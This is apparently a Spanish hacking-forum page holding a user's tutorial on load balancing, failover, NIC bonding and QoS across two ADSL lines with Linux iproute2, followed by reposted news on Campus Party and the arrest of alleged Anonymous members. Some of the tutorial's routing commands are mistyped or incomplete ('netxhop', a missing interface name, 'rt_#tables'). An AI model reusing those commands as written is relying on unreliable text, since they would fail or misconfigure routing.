- Podemos distrubir las solicitudes procedentes de la LAN a través de una politica "round-robin" (por peso) a través de múltiples pasarelas de Internet. En otras palabras, si en un determinado momento sólo hay un usuario de internet haciendo sólo una conexión TCP (por ejemplo, se ejecuta sólo una descarga desde la web), su tráfico se derivará a traves de una única pasarela, por lo que no habría beneficio en el equilibrado de conexiones. En cambio, si la LAN está repleta de usuarios, cada uno ejecutando múltiples solicitudes al mismo tiempo, como un todo, sus conexiones tendrán acceso a un mayor ancho de banda, lo que equivale a la suma de los anchos de banda de acceso único.

IP Failover (fail over, a prueba de fallas)

Failover es cuando tenemos una o más conexiones y cuando falla una salimos automáticamente por la otra que si que funcione. También llamado conexión redundante. Si una de las líneas falla, el router continua automáticamente la conexión utilizando exclusivamente la segunda.



a) Balanceo de Carga (Load balancing)
¿Qué es?
Repartir ancho de banda

El balanceo no suma, reparte.


b) Sumar ancho de banda (Bonding)
Juntar conexiones, unir conexiones, sumar dos conexiones o más

Bonding: ip network multipathing con LINUX

¿Qué es el bonding? Es un driver que originalmente venía con los parches para clusters beowulf, desde hace un tiempo se puede implementar en un kernel 2.2X, 2.4X y 2.6x ¿Pero qué hace realmente?¿Para que sirve? Es la forma de tener dos tarjetas de red funcionando como una sola y aprovechando el ancho de banda de las dos a la vez En definitiva con bonding (ip network multipathing) tendríamos dos tarjetas de red físicas y por encima una virtual que suministra el servicio.

El bonding es una técnica que permite agregar varios interfaces de red físicos en uno único virtual. A cada interfaz físico se le denominará slave (esclavo). Con esto podemos realizar un balanceo de carga entre las dos interfaces y conseguir un ancho de banda final igual a la suma de los anchos de banda de cada slave.

Necesitamos al menos dos conexiones a internet para hacer bonding.

Tipos de Balanceos de Carga con bonding:

Round Robin balance-rr (modo 0)
Va repartiendo el tráfico (entrante) asignando de forma rotatoria cada conexión a una entrada WAN distinta, es decir, la primera a la WAN 01, la siguiente a la WAN 02, la tercera de nuevo a la WAN 01, ...

Se emplea un algoritmo round robin entre la cola virtual y las de los esclavos. Es algo así como: un paquetillo para un esclavo, otro para otro esclavo, un paquetillo para un esclavo, otro para el otro... etc. Es el algoritmo que se usa por defecto.

active-backup (modo 1):

Realmente no balancea la carga, usa sólo un esclavo y en caso de fallar, usa el siguiente disponible. Si falla el activo, pasa al slave (pasivo)

balance-xor (modo 2):

Para transmitir una trama lo hace basado en el siguiente calculo: (MAC de origen XOR MAC destino)%numero de interfaces slaves. De esta manera para cada MAC de destino se selecciona una interfaz en concreto. Este modo nos ofrece balanceo de carga y tolerancia a fallos.

broadcast (modo 3):

se transmite todo por todas las interfaces. Este método no balancea tampoco, pero provee tolerancia a fallos.

802.3ad (modo 4):

Se trata del estandard IEEE 802.3ad (Dynamic link aggregation) también llamado “port trunking“. Permite la definición de agregados ofreciendo alta disponibilidad

balance-tlb (modo 5):

balancea la carga de transmisión entre los esclavos dependiendo de la velocidad de estos y de la carga total. El tráfico es recibido por un esclavo, en caso de fallar otro esclavo toma su MAC y continúa recibiendo tráfico.

balance-alb (modo 6)

realiza el balanceo anterior además de un balanceo también en la recepción.


Otros tipos de balanceo de carga en aparatos de hardware:

Basado en sesiones
Cada conexión de salida se compone de varias conexiones TCP/IP, el router reparte las conexiones de cada sesión entre los dos puertos WAN. Un ejemplo, una página de Internet tiene una sesión TCP/IP por cada elemento de la misma, cuando un usuario se conecta a esa página Web a través del router XiNCOM, los elementos de la página se descargan paralelamente y a la vez utilizando las dos líneas WAN de forma simultanea, es decir, repartiendo los elementos entre las dos líneas de conexión.

Basado en paquetes
En lugar de repartir las conexiones TCP/IP de una sesión, el balanceo de carga basado en paquetes reparte los paquetes de cada conexión TCP/IP entre los dos puertos WAN.



Funcionamiento

¿Cómo lo hacemos?

- Mediante Software

En Windows con el programa WinGate, Double surfer, mobile net switch
virtualwifi, BVRP Connection Manager, MultiNetwork Manager, WiFi Hopper 1.2
Midpoint Internet LoadBalancer, etc

Con el comando "route"  (modificando la tabla de rutas, la ruta de encaminamiento, cambiando la puerta de enlace (gateway))

En Linux con pfsense (una distrbución liviana basada en FreeBSD derivada de m0n0wall), Brazilfw, o Mikrotik

pfSense permite balanceo de carga (load balancing) con detección de fallo (fail-over)
con fail-over. Permite además añadir un Portal Cautivo o captivo (hotspot), OpenVPN, gestión del ancho de banda (limitar y repartir ancho de banda) (Traffic Shape), tráfico por prioridades, etc

Con los comandos  iproute2

Ejemplos

                                                                 ________
                                          +------------+        /
                                          |            |       |
                            +-------------+ Provider 1 +-------
        __                  |             |            |     /
    ___/  \_         +------+-------+     +------------+    |
  _/        \__      |     if1      |                      /
 /             \     |              |                      |
| Local network -----+ Linux router |                      |     Internet
 \_           __/    |              |                      |
   \__     __/       |     if2      |                      \
      \___/          +------+-------+     +------------+    |
                            |             |            |     \
                            +-------------+ Provider 2 +-------
                                          |            |       |
                                          +------------+        \________

Datos previos

Si suponemos los siguientes datos:

Citar
eth0: Interfaz conectado a un ADSL
eth1: Interfaz conectado a otro ADSL
IP0: Dirección IP de la máquina en eth0
IP1: Dirección IP de la máquina en eth1
GW0: Dirección IP del gateway en el interfaz eth0
GW1: Dirección IP del gateway en el interfaz eth1
NET0: Subred de la salida ADSL 0
NET1: Subred de la salida ADSL 1

Definir tablas de rutas

Definir dos tablas de routing auxiliares en el
fichero /etc/iproute2/rt_tables, simplemente añade estas dos lí­neas:

Código:
2 T0
3 T1

Añadir rutas de encaminamiento

Añadir información a las dos tablas auxiliares con información de
routing de cada una de las dos salidas:

Código:
ip route add default via GW0 dev table T0
ip route add NET0 dev eth0 src IP0 table T0
ip route add default via GW1 dev table T1
ip route add NET1 dev eth1 src IP1 table T1

Añadir las reglas de encaminamiento

Añadir las reglas necesarias para utilizar cada una de las dos tablas
auxiliares:

Código:
ip rule add from IP0/32 table T0
ip rule add from IP1/32 table T1

Añadir la ruta por defecto

Añadir la ruta por defecto en la tabla principal, que se encarga de
repartir la carga. Puedes cambiar el peso de cada enlace después del
parámetro weight:

Código:
ip route add default scope global nexthop via GW0 dev eth0 weight 1
nexthop via GW1 dev eth1 weight 1

Ejemplo 2:

Cómo juntar dos ADSL

Nomenclatura:

Citar
eth0  -> primer interfaz conectado a la ADSL1
192.168.1.1  -> IP asociada a eth0
192.168.1.2  -> IP del router ADSL1
192.168.1.0/24  -> subred donde hay ADSL1

eth1  -> primer interfaz conectado a la ADSL2
192.168.2.1  -> IP asociada a eth1
192.168.2.2  -> IP del router ADSL2
192.168.2.0/24  -> subred donde hay ADSL2

Primero:
Crear dos tablas de rutas adicionales al fichero /etc/iproute2/rt_#tables/.
Es tan sencillo como abrir el fichero con un editor de texto y añadir las dos líneas siguientes:
200 ADSL1
201 ADSL2

Segundo:
Asignamos cada subred a la tabla e interfaz correspondiente.
Desde el prompt del sistema:
Código:
# ip route add 192.168.1.0/24 dev eth0 src 192.168.1.1 table ADSL1
# ip route add default via 192.168.1.2 table ADSL1
# ip route add 192.168.2.0/24 dev eth1 src 192.168.2.1 table ADSL2
# ip route add default via 192.168.2.2 table ADSL2

Tercero:
Ahora hace falta asegurar que el servidor contesta por la misma interfaz que se ha hecho la petición.
Código:
# ip route add 192.168.1.0/24 dev eth0 src 192.168.1.1
# ip route add 192.168.2.0/24 dev eth1 src 192.168.2.1

Quarto:
Sólo hace falta crear la ruta por defecto balanceada.
Código:
# ip route add default scope global netxhop via 192.168.1.2 dev eth0 weight 1 nexthop via 192.168.2.2 dev eth1 weight 1


- Mediante Hardware

Routers de doble Wan (Dual Wan) "Multihomed" o "Multiwan".

Balanceador de carga con el protocolo CARP (Common Address Redundancy Protocol), básicamente es proporciona redundancia. Es decir que si tu internet falla, el software lo detecta en decimas de segundo y te hace el switch hacia el enlace bueno, el usuario nunca se da cuenta cuando falla el servicio.

Muxing, multiplexar líneas ADSL.

Sólo es posible por hardware.


Limitar y Repartir ancho de banda

Palabras claves: Traffic Shapper o Traffic Shapping, QoS, fair queuing

QoS (Quality of Service o Calidad de Servicio) es un conjunto de protocolos y tecnologías que garantizan la entrega de datos a través de la red en un momento dado. Una de las principales metas de QoS es la priorización.

Por defecto, cuando enviamos información por una interfaz (tarjeta de red en este caso) las tramas de datos se encolan en una pila FIFO: la primera trama en entrar, es la primera en salir.

Configurar QoS (Quality of Service) en el router.

Los routers Zyxel llevan la opción "Media Bandwidth Management"
http://www.adslzone.net/tutorial-20.18.html

Los routers CT Comtrend para configurar el QoS debes ir a Advanced Setup => Quality of Service dentro de la configuración del router.

Con Mikrotik PCQ (Queues)

Con PfSense y su opción de Traffic Shape.

Con un router que acepte firmware dd-wrt

Programas para Windows como el NetPeeker que permite repartir el ancho de banda (tanto de subida como de bajada) para cada aplicación.

Más programas:

El NetLimiter o el DU Super Controler, o el WebScout, y el Bandwidth Speed Balancer, el Bandwidth Controller, WinTC,
DU Meter, Net Peeker, BWMeter
 
Para limitar el ancho de banda en Linu hace bastante tiempo que se puede usar:

- iproute2 (TC, traffic control)
- cbq.init

Y para controlar el ancho de banda no, pero para medirlo y controlar mucha más información está el ntop,

http://www.openxtra.com/products/ntop-xtra.htm




Referencias, fuentes
http://www.zeroshell.net/eng/net-balancer-spanish/
http://multingles.net/docs/jmt/2isps.htm
http://crysol.org/es/node/811
http://www.openbsd.org/faq/pf/es/queueing.html
http://www.openbsd.org/faq/pf/index.html
http://bulma.net/body.phtml?nIdNoticia=1759
http://redesteleco.com/balanceo_de_carga
http://guifi.net/es/node/10643
http://gnulinuxtips.blogspot.com/2010/10/balanceo-de-carga-con-pfsense.html
http://doc.pfsense.org/index.php/MultiWanVersion1.2
http://www.openbsd.org/faq/pf/es/queueing.html
http://www.bellera.cat/josep/pfsense/cabal_cs.html



En el foro:

conectarse a varias Wifi a la vez
http://foro.elhacker.net/hacking_wireless/conectarse_a_varias_wifi_a_la_vez-t195713.0.html

Slurpr casero?
http://foro.elhacker.net/hacking_wireless/slurpr_casero-t171149.0.html

¿ PC con varias tarjetas pci Wireless ?
http://foro.elhacker.net/hacking_wireless/iquest_pc_con_varias_tarjetas_pci_wireless-t132517.0.html

Unir 2 adsl
http://foro.elhacker.net/redes/unir_2_adsl_balanceo_de_carga-t319418.0.html

Juntar 2 redes wifi con 2 tarjetas en un mismo ordenador
http://foro.elhacker.net/hacking_wireless/juntar_2_redes_wifi_con_2_tarjetas_en_un_mismo_ordenador-t318331.0.html

wireless router con WDS
http://foro.elhacker.net/redes/wireless_router_con_wds-t309788.0.html

2 o mas cabldemodems en un pc..!!! se pude....!!!
http://foro.elhacker.net/redes/2_o_mas_cabldemodems_en_un_pc_se_pude-t145261.0.html

Manual: balanceo carga PCC con FAILover
http://foro.elhacker.net/materiales_y_equipos/manual_balanceo_carga_pcc_con_failover-t322997.0.html

Balanceo de carga entre dos ISP con Ubuntu 10.04
http://foro.elhacker.net/redes/balanceo_de_carga_entre_dos_isp_con_ubuntu_1004-t311359.0.html

Temas viejos (2005-06-07)

Conectarse a dos redes inalámbricas a la vez
http://foro.elhacker.net/index.php/topic,145048.0.html

Ayuda limitación de ancho de banda
http://foro.elhacker.net/index.php/topic,122243.0.html

como sumar ancho de banda de una o mas redes distintas
http://foro.elhacker.net/index.php/topic,109496.0.html

Varias redes disponibles = varias conexiones distintas??
http://foro.elhacker.net/index.php/topic,68065.0.html

Conectar dos redes con dos tarjetas?
http://foro.elhacker.net/index.php/topic,98696.0.html

software para crear redes vecinales
http://foro.elhacker.net/index.php/topic,145512.0.html
199  Foros Generales / Noticias / La Campus Party deja Valencia por la crisis en: 28 Febrero 2012, 20:16 pm
    Los organizadores barajan como alternativas Madrid o Barcelona
    La ciudad definitiva y la fecha se anunciarán en los próximos días
    Será la primera vez en 12 años que Valencia no acoja la Campus Party

La crisis también pasa factura a la Campus Party. Después de 12 años, y por primera vez, este gran encuentro de internautas y aficionados a las nuevas tecnologías no se celebrará en Valencia como consecuencia de las dificultades económicas por las que atraviesa la Generalitat Valenciana.

Pero los campuseros no tienen que temer, porque la decimosexta edición de la Campus Party en España se celebrará "aunque sea debajo de un puente", afirma en su blog Francisco Ragageles, uno de los tres fundadores del evento.

Las ciudades que cuentan con mayores opciones son "Madrid o Barcelona", avanza a RTVE.es Belinda Galiano, otra de las fundadoras de la Campus, Las posibilidades de "hacerlo en una en concreto están muy avanzadas, pero la decisión se tomará en los próximos días", asegura.

    La 16 edición de la Campus Party en España se celebrará aunque sea debajo de un puente

Tanto la Generalitat como la organización querían que la Campus volviese a celebrarse en Valencia, incluso tenían un contrato que les vinculaba "durante otras tres ediciones", pero la "situación tan compleja que vive nuestro país nos ha obligado a desvincularnos de la Comunidad Valenciana", reconoce Galiano.

El convenio fue aprobado por el gobierno valenciano en marzo de 2011 por un importe global de 6,2 millones de euros como cifra máxima, según apunta EFE, aunque se ajustaría cada año al coste real.

A pesar del imprevisto, la popularidad de la Campus ha provocado que no falten ciudades interesadas en albergar el acontecimiento. "Desde que comenzamos a celebrarla, siempre ha habido mucha gente interesada en acogerla, por lo que ahora ha sido más fácil", señala la cofundadora.

Los organizadores confían que la situación se resuelva en "las próximas semanas" e incluso solicitarán la participación de los campuseros "para escoger la fecha en la que se organizará", aunque son las habituales, "la segunda o la tercera semana de julio, pero se hará lo que diga la mayoría", recalca Galiano.

La mayor fiesta on-line del planeta

La Campus Party cumplirá 15 años de vida en agosto. La primera edición se celebró en 1997 en Mollina de Segura, una localidad malagueña de 4.000 habitantes a la que acudieron los 250 primeros campuseros, aunque en el Telediario se referían a estos pioneros como 'campistas informáticos'.


Fuente:
http://www.rtve.es/noticias/20120228/campus-party-deja-valencia-crisis/502398.shtml
200  Foros Generales / Noticias / Detienen 4 miembros de Anonymous en España por filtrar datos de escoltas y geos en: 28 Febrero 2012, 11:45 am
'Thunder', 'Pacotron' o 'Troy', tras estos alias se escondían, según la Policía, los cabecillas de Anonymous en España. En total, cuatro personas han sido detenidas y dos de ellas han ingresado en prisión en el marco de una operación internacional que se ha saldado con otros 10 imputados en Argentina, seis en Chile y cinco en Colombia.

En Málaga se ha detenido a F.J.B.D., que operaba bajo el 'nick' de 'Thunder' o 'Pacotron' y que, según la Policía, estaba "presuntamente encargado de administrar y gestionar la infraestructura informática utilizada por Anonymous en España e Iberoamérica".

Dos de los arrestados han ingresado en prisión por orden judicial, otro ha quedado en libertad bajo fianza y el cuarto, menor de edad, bajo la custodia de sus padres. Según la Policía Nacional, los detenidos serían los presuntos responsables de ataques de denegación de servicio -DDoS- y 'defacement' -modificación de una web sin autorización del propietario- a páginas web de partidos políticos, instituciones y empresas, así como de la publicación de datos privados en la Red.

En concreto, se vincula a los sospechosos con los ataques realizados recientemente a la página web de UPyD, así como a la exposición de datos personales de miembros del GEO -Grupo Especial de Operaciones- y personal de seguridad de la presidencia del Gobierno. Poco después, sin embargo, un miembro de Anonymous aseguraba que el colectivo no estaba relacionado con estos ataques.

La Policía, por su parte, afirma que "los ataques cibernéticos respondían en ocasiones a acciones individuales que se apoyaban en una pluralidad de personas que unían sus esfuerzos y conocimientos para perpetrarlos".

Se han intervenido 25 ordenadores personales, discos duros y otros dispositivos de almacenamiento que están todavía siendo analizados. Además, también han bloqueado dos servidores en Bulgaria y la República Checa.

En la operación, coordinada por la Interpol y denominada 'Exposure', hay otros 10 imputados en Argentina, seis en Chile y cinco en Colombia.


Fuente:
http://www.elmundo.es/elmundo/2012/02/28/navegante/1330421554.html
Páginas: 1 ... 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [20] 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines